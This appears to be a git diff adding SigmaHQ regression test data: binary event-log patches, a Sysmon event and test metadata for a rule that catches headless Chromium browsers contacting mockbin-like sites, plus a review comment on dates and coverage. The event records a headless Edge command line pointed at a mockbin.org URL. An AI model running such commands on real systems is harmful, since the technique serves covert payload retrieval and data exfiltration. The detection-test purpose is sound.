zOw5IdXrHMc1CVL5KD49u^rGBzQOflCiO*e!dcF;P9qaYGy43&-ftcgTqDFkJbykQ( zKHi9K5;s3NIb~jn37#BkMCPdPg;UFKby=b@lz06}qu303M2(X?p6Zsi2HMeXtY^|< zoqC=WZ!8Q0RlISW9YlPpab&|Aox@*x6rDPUH@=PYLpT&~v}5EHZ-h-wAKRvQBgd#I z-k4|X*`Z9l@mW9K*spk_;*DsU{0NoejX5z)#T(t|^->I&E-t+B4aFOQrPL`D^F z^iKuh7>3UWZzQ@>Jh%}@(^5dzBeinx6Df(HMoD}_>3H@~NgO0X@53ZvvIa$=3 z;kzCJ(b1M1-KnE3k8|d2=4i_Yf96L&2NeBO^i$E#)HNwe15sckxkhj*`dPf_=NEgl z<>62j8P@u234H!9wkoavf5#$88S z=35Kk^PEYoc%$Ntg|0~fZw{Yo9N9)&I)`6$w58&Wz7+-6Lt_+gRJ`#7R{F~vZTZUc ze!Ou|@kYfPVQ6%;B@jlt2Cm|bQw7h<*3p)!tB-wt9tUT4E8du#Jz8wDyLGf>ZcI%_ zTjrJxu~;2#nSI3sML!k&RPe`kZU3|K&ZRy~L_?uY8$;~zYCC(qkp>xf3 zt~o~j3>&{(=bD=Z*wXex(YfY%=9)iRmcF*-+CTWw&)tfCD*CDDr;fHfo!7Qp?X7M3 zUeK;>dD$0oZOe_@KO0J*s&eJcwb-UA`(6Q=>(6y!{`n597SGN2?0x}LQy1lkU0DBl zF4n3nhV{hgQKhalcj|dkA8#&vylc?s=FS+q@P8Hd(%O#o7I(t4^rvmAV$M-5u4C1E zG{vub8|R1AuN#2q%s!jChM2A)<~EQ~zpn88D-UJ(bx*wJ_v?n#uT#GcW>!bF=%|*{ zcF%&_&KSRr+l$bzyJ6a|v-_K5+clCS{<$~nU073P)bvSrU?;C`qv!5!Exf%6gsR0| z?sm%^zSR4h%}#OLWmCPsnRnFt;;pB0GQ2<6{n{L@Oup6o0G=P;^66VW_5Sp&p01%1 zJkB*#-pug+u71Ps{SB-4r{14>fBIJMbbhNhe#Urz+;WlL-!lbye>=?1*SEu`+lx08 zqZl1@03O~r{5|efm@qp{-GTFQv!fXI#n;Kb&mT9%yEA#!ykO;Z+?GpkNSh^52`VWFcu`!SD}@B9v6l7znL(>Hx1zyW%I0B{DaeV5F-PYvO|?8E`M 
zWBY96q@G|Vh6BkI|yXQ!T>dUhw^**%is*)9LO-?Q7Ro}GGj>e;Dh zcRG7^t!Ip9x6SkHj$l|=cF!(zZ@~km7q33uYa9j(_f+>r`d5tC!|C2uK@zE;nMY7*=A9gryz!;U{*cqGa5%xpJiiMkAlvD9=qkF?NNh2&z zTsq}C{BFa{aNbF-%i16@Xmb;^D3=Ch_VDsiYeV_BB88JhtqruAP7*cdHFbT2bgMSI zoHk-d`o=tVAd_1DouhSc7~LDj^$BXwe_$I!9dk9w_0;%=Bo3Ru&-50C@rGn>R`ojNye?)Nx<0f)|`(s@)mk4ooJ9q&A<7ozE_BYyOx|LsbTzFpC` zD`=i{6%F*CbZ?jnAbRns(`|1Uhc3QRZdXTa1lm|@dcuw9d)A`gSZ}Ud(F>z*xEjAP z{I=k{4hKCv?!I#Fk|RSs7qPdtJ~(-y$kOv2&UUJM(&X-IKo@`Op^HOTIL;JZq<1s7 z=%VfflY6%l-3cbQY;-4>+_KS~V00%K-3dl_f+_5+zG9vJm3r+v8?J%Yk8$rKDQ|0v z3F~xV!3rZ*jU(Gw{OdiqhGF!h5>N@K1XKbl0hNGCKqa6O zPzk66R01jim4He>C7=>e38(~A0xAKOfJ#6mpb}6Cs0363Dgl*%NN@K1XKbl b0hNGCKqa6OPzk66R01jim4Hg1Xe97|aEYri literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json new file mode 100644 index 000000000..3713caf79 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:28:43.862519Z" + } + }, + "EventRecordID": 32995046, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:28:43.810", + "ProcessGuid": "5AA13A44-AEAB-68FE-435E-000000004002", + "ProcessId": 5784, + "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", + "FileVersion": "141.0.3537.99", + "Description": "Microsoft Edge", + "Product": "Microsoft Edge", + "Company": "Microsoft Corporation", + "OriginalFileName": "msedge.exe", + "CommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --headless=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": 
"ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml new file mode 100644 index 000000000..7ad3f91ab --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml @@ -0,0 +1,12 @@ +id: 686da1dd-caec-47d8-a254-07ab54f1f3c7 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 1c526788-0abe-4713-862f-b520da5e5316 + title: Chromium Browser Headless Execution To Mockbin Like Site +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx 
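Review bot: `date: 2025-10-24` in this info.yml is two days earlier than the `SystemTime` (2025-10-26T23:28:43Z) of the event in the JSON above it; if `date` records when the sample was captured it should read 2025-10-26, and if it records when the test was authored that should be stated in the schema, because the same 2025-10-24 value is reused across every info.yml in this patch regardless of event time. Separately, the only sample for "Chromium Browser Headless Execution To Mockbin Like Site" is `msedge.exe` with `--headless=new --disable-gpu`, so the Chrome image path of the rule is not covered by a headless sample; a second `regression_tests_info` entry or a note in `description` would make that coverage gap explicit.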
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx new file mode 100644 index 0000000000000000000000000000000000000000..c40cb656d8c4e584b9eff20c6762bc4781c081b6 GIT binary patch literal 69632 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 